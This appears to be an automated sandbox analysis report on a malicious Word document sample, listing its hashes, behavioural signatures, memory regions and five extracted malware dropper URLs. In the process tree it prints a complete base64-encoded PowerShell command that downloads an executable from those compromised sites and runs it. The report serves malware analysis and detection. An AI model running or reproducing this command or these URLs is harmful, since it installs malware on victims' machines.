Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 23:34

General

  • Target

    eea6bab29a2c5672788810b8153e65ae_JaffaCakes118.doc

  • Size

    228KB

  • MD5

    eea6bab29a2c5672788810b8153e65ae

  • SHA1

    9eb6e475fc9f509488d0270e087824ef18ab74dd

  • SHA256

    58b4019b5b5bee18e910424744e4b98793ed962b3642a15f00f9d16f6d2d8e23

  • SHA512

    50ee14b08f4c1fed93f1464d84b802963c6ef6f4b623360ec839981bb3167895c612f4b33dbe86259e043aa88d5f6fbe76020eaa256de3eda970969a2763bc2e

  • SSDEEP

    3072:Sj6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkeMeGYGdSyRwn0dRs:SHgtEWPsL/aTyT9Gke1GYGzRwncRs

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://si-morgh.com/wp-includes/brMYT734/

exe.dropper

http://nlfgo.com/wp-admin/4d2WC234123/

exe.dropper

http://vip.5k6k.com/cs5h/aoX8wY2/

exe.dropper

http://esenlerdugunsalonu.com/wp-includes/uCzyiZSkg/

exe.dropper

http://aeasinos.com.br/images/5ROM44/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eea6bab29a2c5672788810b8153e65ae_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABFADMAMAAyAGQAOQBxACAAPQAgACcAUQB6AHIAYQAnADsAJABQAGcAZAAzAHEANgA1AD0AJwBDADMAegBlAHcAZgBsACcAOwAkAFQAMQBhAF8ANgBwADUAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABFADMAMAAyAGQAOQBxACsAJwAuAGUAeABlACcAOwAkAEwAagBlAGYAdwA2AG0APQAnAEkAagBuAHIANgBtADMAJwA7ACQAUQBiAHoAMwBqAHYAZwA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAQgBDAEwAaQBlAE4AVAA7ACQARQBrAGkAYQAxAGMAcwA9ACcAaAB0AHQAcAA6AC8ALwBzAGkALQBtAG8AcgBnAGgALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGIAcgBNAFkAVAA3ADMANAAvACoAaAB0AHQAcAA6AC8ALwBuAGwAZgBnAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADQAZAAyAFcAQwAyADMANAAxADIAMwAvACoAaAB0AHQAcAA6AC8ALwB2AGkAcAAuADUAawA2AGsALgBjAG8AbQAvAGMAcwA1AGgALwBhAG8AWAA4AHcAWQAyAC8AKgBoAHQAdABwADoALwAvAGUAcwBlAG4AbABlAHIAZAB1AGcAdQBuAHMAYQBsAG8AbgB1AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB1AEMAegB5AGkAWgBTAGsAZwAvACoAaAB0AHQAcAA6AC8ALwBhAGUAYQBzAGkAbgBvAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8ANQBSAE8ATQA0ADQALwAnAC4AIgBzAHAAbABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAOAA1ADcANwA0AG4APQAnAFUAZgBiADYANwAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAYwB1AG8ANQBhAGMAIABpAG4AIAAkAEUAawBpAGEAMQBjAHMAKQB7AHQAcgB5AHsAJABRAGIAegAzAGoAdgBnAC4AIgBkAE8AdwBgAE4ATABPAGAAQQBEAGYASQBMAGUAIgAoACQAQgBjAHUAbwA1AGEAYwAsACAAJABUADEAYQBfADYAcAA1ACkAOwAkAEoAYgBoADEAdAA3ADkAPQAnAFYANQBwAGcAcwBtAGQAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUADEAYQBfADYAcAA1ACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAOAA1ACkAIAB7AC4AKAAnAEkAbgAnACsAJwB2ACcAKwAnAG8AJwArACcAawBlAC0ASQB0AGUAbQAnACkAKAAkAFQAMQBhAF8ANgBwADUAKQA7ACQARwBnAHoAbQBxAF8AeQA9ACcAQwBuAHEANQBzAG8AbwAnADsAYgByAGUAYQBrADsAJABMAGQANQBmAGMAOABiAD0AJwBDAGIAYgBuAGcAdQBxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcANgB3ADMAagB1ADkAPQAnAE8ANABwAHQAcgA4AG0AJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      adb4bd9d811bb05fe1d5dba65941a9e5

      SHA1

      a3ed4258fa8ff38489bcb4c7d0f32fa25a45f011

      SHA256

      5e98cfdbe23f7788d32adb9ff8e3dee1125b62be67369e63f63806456ee51d5b

      SHA512

      edbdac9687175517aaf5f888fe1bff8701bc8b57a4b788c63543726576d1e01ec10d4946ece6ec52935367f63fe766dcfd6f44dc1107ecc9ba4d655334be25fc

    • memory/1832-26-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-42-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-5-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-7-0x0000000005CF0000-0x0000000005DF0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-6-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-11-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-12-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-10-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-9-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-8-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-15-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-14-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-13-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-27-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-16-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-19-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-22-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-20-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1832-2-0x00000000717DD000-0x00000000717E8000-memory.dmp

      Filesize

      44KB

    • memory/1832-17-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-25-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-24-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-23-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-32-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-31-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-29-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-28-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-30-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-33-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-62-0x00000000717DD000-0x00000000717E8000-memory.dmp

      Filesize

      44KB

    • memory/1832-18-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-41-0x00000000717DD000-0x00000000717E8000-memory.dmp

      Filesize

      44KB

    • memory/1832-0-0x000000002FCA1000-0x000000002FCA2000-memory.dmp

      Filesize

      4KB

    • memory/1832-43-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-44-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/1832-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2944-40-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2944-39-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

      Filesize

      2.9MB